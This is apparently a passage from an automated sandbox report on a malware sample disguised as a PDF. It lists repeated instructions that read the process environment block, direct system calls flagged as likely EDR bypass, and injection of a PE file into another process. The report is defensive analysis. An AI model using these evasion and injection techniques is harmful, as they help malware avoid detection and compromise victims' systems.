                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01788918 mov eax, dword ptr fs:[00000030h]3_2_01788918
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01788918 mov eax, dword ptr fs:[00000030h]3_2_01788918
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0181E9E0 mov eax, dword ptr fs:[00000030h]3_2_0181E9E0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017C29F9 mov eax, dword ptr fs:[00000030h]3_2_017C29F9
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017C29F9 mov eax, dword ptr fs:[00000030h]3_2_017C29F9
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0180E908 mov eax, dword ptr fs:[00000030h]3_2_0180E908
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0180E908 mov eax, dword ptr fs:[00000030h]3_2_0180E908
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0181C912 mov eax, dword ptr fs:[00000030h]3_2_0181C912
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0179A9D0 mov eax, dword ptr fs:[00000030h]3_2_0179A9D0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0179A9D0 mov eax, dword ptr fs:[00000030h]3_2_0179A9D0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0179A9D0 mov eax, dword ptr fs:[00000030h]3_2_0179A9D0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0179A9D0 mov eax, dword ptr fs:[00000030h]3_2_0179A9D0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0179A9D0 mov eax, dword ptr fs:[00000030h]3_2_0179A9D0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0179A9D0 mov eax, dword ptr fs:[00000030h]3_2_0179A9D0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0182892B mov eax, dword ptr fs:[00000030h]3_2_0182892B
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0181892A mov eax, dword ptr fs:[00000030h]3_2_0181892A
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017C49D0 mov eax, dword ptr fs:[00000030h]3_2_017C49D0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01864940 mov eax, dword ptr fs:[00000030h]3_2_01864940
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01810946 mov eax, dword ptr fs:[00000030h]3_2_01810946
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017909AD mov eax, dword ptr fs:[00000030h]3_2_017909AD
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017909AD mov eax, dword ptr fs:[00000030h]3_2_017909AD
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A29A0 mov eax, dword ptr fs:[00000030h]3_2_017A29A0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A29A0 mov eax, dword ptr fs:[00000030h]3_2_017A29A0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A29A0 mov eax, dword ptr fs:[00000030h]3_2_017A29A0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A29A0 mov eax, dword ptr fs:[00000030h]3_2_017A29A0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A29A0 mov eax, dword ptr fs:[00000030h]3_2_017A29A0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A29A0 mov eax, dword ptr fs:[00000030h]3_2_017A29A0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A29A0 mov eax, dword ptr fs:[00000030h]3_2_017A29A0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A29A0 mov eax, dword ptr fs:[00000030h]3_2_017A29A0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A29A0 mov eax, dword ptr fs:[00000030h]3_2_017A29A0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A29A0 mov eax, dword ptr fs:[00000030h]3_2_017A29A0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A29A0 mov eax, dword ptr fs:[00000030h]3_2_017A29A0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A29A0 mov eax, dword ptr fs:[00000030h]3_2_017A29A0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A29A0 mov eax, dword ptr fs:[00000030h]3_2_017A29A0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01834978 mov eax, dword ptr fs:[00000030h]3_2_01834978
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01834978 mov eax, dword ptr fs:[00000030h]3_2_01834978
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0181C97C mov eax, dword ptr fs:[00000030h]3_2_0181C97C
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0181C89D mov eax, dword ptr fs:[00000030h]3_2_0181C89D
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01794859 mov eax, dword ptr fs:[00000030h]3_2_01794859
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01794859 mov eax, dword ptr fs:[00000030h]3_2_01794859
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017C0854 mov eax, dword ptr fs:[00000030h]3_2_017C0854
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A2840 mov ecx, dword ptr fs:[00000030h]3_2_017A2840
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018608C0 mov eax, dword ptr fs:[00000030h]3_2_018608C0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CA830 mov eax, dword ptr fs:[00000030h]3_2_017CA830
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017B2835 mov eax, dword ptr fs:[00000030h]3_2_017B2835
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017B2835 mov eax, dword ptr fs:[00000030h]3_2_017B2835
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017B2835 mov eax, dword ptr fs:[00000030h]3_2_017B2835
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017B2835 mov ecx, dword ptr fs:[00000030h]3_2_017B2835
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017B2835 mov eax, dword ptr fs:[00000030h]3_2_017B2835
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017B2835 mov eax, dword ptr fs:[00000030h]3_2_017B2835
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0185A8E4 mov eax, dword ptr fs:[00000030h]3_2_0185A8E4
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CC8F9 mov eax, dword ptr fs:[00000030h]3_2_017CC8F9
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CC8F9 mov eax, dword ptr fs:[00000030h]3_2_017CC8F9
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0181C810 mov eax, dword ptr fs:[00000030h]3_2_0181C810
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0183483A mov eax, dword ptr fs:[00000030h]3_2_0183483A
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0183483A mov eax, dword ptr fs:[00000030h]3_2_0183483A
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BE8C0 mov eax, dword ptr fs:[00000030h]3_2_017BE8C0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01826870 mov eax, dword ptr fs:[00000030h]3_2_01826870
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01826870 mov eax, dword ptr fs:[00000030h]3_2_01826870
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0181E872 mov eax, dword ptr fs:[00000030h]3_2_0181E872
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0181E872 mov eax, dword ptr fs:[00000030h]3_2_0181E872
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01790887 mov eax, dword ptr fs:[00000030h]3_2_01790887
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0178CB7E mov eax, dword ptr fs:[00000030h]3_2_0178CB7E
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01788B50 mov eax, dword ptr fs:[00000030h]3_2_01788B50
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01844BB0 mov eax, dword ptr fs:[00000030h]3_2_01844BB0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01844BB0 mov eax, dword ptr fs:[00000030h]3_2_01844BB0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0183EBD0 mov eax, dword ptr fs:[00000030h]3_2_0183EBD0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BEB20 mov eax, dword ptr fs:[00000030h]3_2_017BEB20
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BEB20 mov eax, dword ptr fs:[00000030h]3_2_017BEB20
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0181CBF0 mov eax, dword ptr fs:[00000030h]3_2_0181CBF0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01864B00 mov eax, dword ptr fs:[00000030h]3_2_01864B00
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BEBFC mov eax, dword ptr fs:[00000030h]3_2_017BEBFC
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01798BF0 mov eax, dword ptr fs:[00000030h]3_2_01798BF0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01798BF0 mov eax, dword ptr fs:[00000030h]3_2_01798BF0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01798BF0 mov eax, dword ptr fs:[00000030h]3_2_01798BF0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0180EB1D mov eax, dword ptr fs:[00000030h]3_2_0180EB1D
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0180EB1D mov eax, dword ptr fs:[00000030h]3_2_0180EB1D
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0180EB1D mov eax, dword ptr fs:[00000030h]3_2_0180EB1D
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0180EB1D mov eax, dword ptr fs:[00000030h]3_2_0180EB1D
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0180EB1D mov eax, dword ptr fs:[00000030h]3_2_0180EB1D
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0180EB1D mov eax, dword ptr fs:[00000030h]3_2_0180EB1D
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0180EB1D mov eax, dword ptr fs:[00000030h]3_2_0180EB1D
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0180EB1D mov eax, dword ptr fs:[00000030h]3_2_0180EB1D
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0180EB1D mov eax, dword ptr fs:[00000030h]3_2_0180EB1D
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01858B28 mov eax, dword ptr fs:[00000030h]3_2_01858B28
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01858B28 mov eax, dword ptr fs:[00000030h]3_2_01858B28
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017B0BCB mov eax, dword ptr fs:[00000030h]3_2_017B0BCB
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017B0BCB mov eax, dword ptr fs:[00000030h]3_2_017B0BCB
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017B0BCB mov eax, dword ptr fs:[00000030h]3_2_017B0BCB
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01790BCD mov eax, dword ptr fs:[00000030h]3_2_01790BCD
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01790BCD mov eax, dword ptr fs:[00000030h]3_2_01790BCD
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01790BCD mov eax, dword ptr fs:[00000030h]3_2_01790BCD
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01838B42 mov eax, dword ptr fs:[00000030h]3_2_01838B42
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01826B40 mov eax, dword ptr fs:[00000030h]3_2_01826B40
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01826B40 mov eax, dword ptr fs:[00000030h]3_2_01826B40
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A0BBE mov eax, dword ptr fs:[00000030h]3_2_017A0BBE
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A0BBE mov eax, dword ptr fs:[00000030h]3_2_017A0BBE
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0185AB40 mov eax, dword ptr fs:[00000030h]3_2_0185AB40
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01844B4B mov eax, dword ptr fs:[00000030h]3_2_01844B4B
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01844B4B mov eax, dword ptr fs:[00000030h]3_2_01844B4B
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01862B57 mov eax, dword ptr fs:[00000030h]3_2_01862B57
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01862B57 mov eax, dword ptr fs:[00000030h]3_2_01862B57
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01862B57 mov eax, dword ptr fs:[00000030h]3_2_01862B57
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01862B57 mov eax, dword ptr fs:[00000030h]3_2_01862B57
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0183EB50 mov eax, dword ptr fs:[00000030h]3_2_0183EB50
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01864A80 mov eax, dword ptr fs:[00000030h]3_2_01864A80
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CCA6F mov eax, dword ptr fs:[00000030h]3_2_017CCA6F
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CCA6F mov eax, dword ptr fs:[00000030h]3_2_017CCA6F
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CCA6F mov eax, dword ptr fs:[00000030h]3_2_017CCA6F
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A0A5B mov eax, dword ptr fs:[00000030h]3_2_017A0A5B
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A0A5B mov eax, dword ptr fs:[00000030h]3_2_017A0A5B
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01796A50 mov eax, dword ptr fs:[00000030h]3_2_01796A50
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01796A50 mov eax, dword ptr fs:[00000030h]3_2_01796A50
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01796A50 mov eax, dword ptr fs:[00000030h]3_2_01796A50
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01796A50 mov eax, dword ptr fs:[00000030h]3_2_01796A50
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01796A50 mov eax, dword ptr fs:[00000030h]3_2_01796A50
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01796A50 mov eax, dword ptr fs:[00000030h]3_2_01796A50
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01796A50 mov eax, dword ptr fs:[00000030h]3_2_01796A50
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CCA38 mov eax, dword ptr fs:[00000030h]3_2_017CCA38
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017B4A35 mov eax, dword ptr fs:[00000030h]3_2_017B4A35
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017B4A35 mov eax, dword ptr fs:[00000030h]3_2_017B4A35
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BEA2E mov eax, dword ptr fs:[00000030h]3_2_017BEA2E
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CCA24 mov eax, dword ptr fs:[00000030h]3_2_017CCA24
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0181CA11 mov eax, dword ptr fs:[00000030h]3_2_0181CA11
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CAAEE mov eax, dword ptr fs:[00000030h]3_2_017CAAEE
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CAAEE mov eax, dword ptr fs:[00000030h]3_2_017CAAEE
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01790AD0 mov eax, dword ptr fs:[00000030h]3_2_01790AD0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017C4AD0 mov eax, dword ptr fs:[00000030h]3_2_017C4AD0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017C4AD0 mov eax, dword ptr fs:[00000030h]3_2_017C4AD0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017E6ACC mov eax, dword ptr fs:[00000030h]3_2_017E6ACC
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017E6ACC mov eax, dword ptr fs:[00000030h]3_2_017E6ACC
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017E6ACC mov eax, dword ptr fs:[00000030h]3_2_017E6ACC
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01798AA0 mov eax, dword ptr fs:[00000030h]3_2_01798AA0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01798AA0 mov eax, dword ptr fs:[00000030h]3_2_01798AA0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017E6AA4 mov eax, dword ptr fs:[00000030h]3_2_017E6AA4
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0183EA60 mov eax, dword ptr fs:[00000030h]3_2_0183EA60
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017C8A90 mov edx, dword ptr fs:[00000030h]3_2_017C8A90
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Found direct / indirect Syscall (likely to bypass EDR)
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeNtCreateMutant: Direct from: 0x774635CCJump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeNtWriteVirtualMemory: Direct from: 0x77462E3CJump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeNtMapViewOfSection: Direct from: 0x77462D1CJump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeNtResumeThread: Direct from: 0x774636ACJump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeNtProtectVirtualMemory: Direct from: 0x77462F9CJump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeNtSetInformationProcess: Direct from: 0x77462C5CJump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeNtSetInformationThread: Direct from: 0x774563F9Jump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeNtNotifyChangeKey: Direct from: 0x77463C2CJump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeNtAllocateVirtualMemory: Direct from: 0x77462BFCJump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeNtQueryInformationProcess: Direct from: 0x77462C26Jump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeNtResumeThread: Direct from: 0x77462FBCJump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeNtReadFile: Direct from: 0x77462ADCJump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeNtQuerySystemInformation: Direct from: 0x77462DFCJump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeNtDelayExecution: Direct from: 0x77462DDCJump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeNtAllocateVirtualMemory: Direct from: 0x77463C9CJump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeNtClose: Direct from: 0x77462B6C
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeNtCreateUserProcess: Direct from: 0x7746371CJump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeNtWriteVirtualMemory: Direct from: 0x7746490CJump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeNtAllocateVirtualMemory: Direct from: 0x774648ECJump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeNtQuerySystemInformation: Direct from: 0x774648CCJump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeNtQueryVolumeInformationFile: Direct from: 0x77462F2CJump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeNtReadVirtualMemory: Direct from: 0x77462E8CJump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeNtCreateKey: Direct from: 0x77462C6CJump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeNtSetInformationThread: Direct from: 0x77462B4CJump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeNtQueryAttributesFile: Direct from: 0x77462E6CJump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeNtDeviceIoControlFile: Direct from: 0x77462AECJump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeNtOpenSection: Direct from: 0x77462E0CJump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeNtCreateFile: Direct from: 0x77462FECJump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeNtOpenFile: Direct from: 0x77462DCCJump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeNtQueryInformationToken: Direct from: 0x77462CACJump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeNtTerminateThread: Direct from: 0x77462FCCJump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeNtAllocateVirtualMemory: Direct from: 0x77462BECJump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeNtOpenKeyEx: Direct from: 0x77462B9CJump to behavior
                    Injects a PE file into a foreign processes
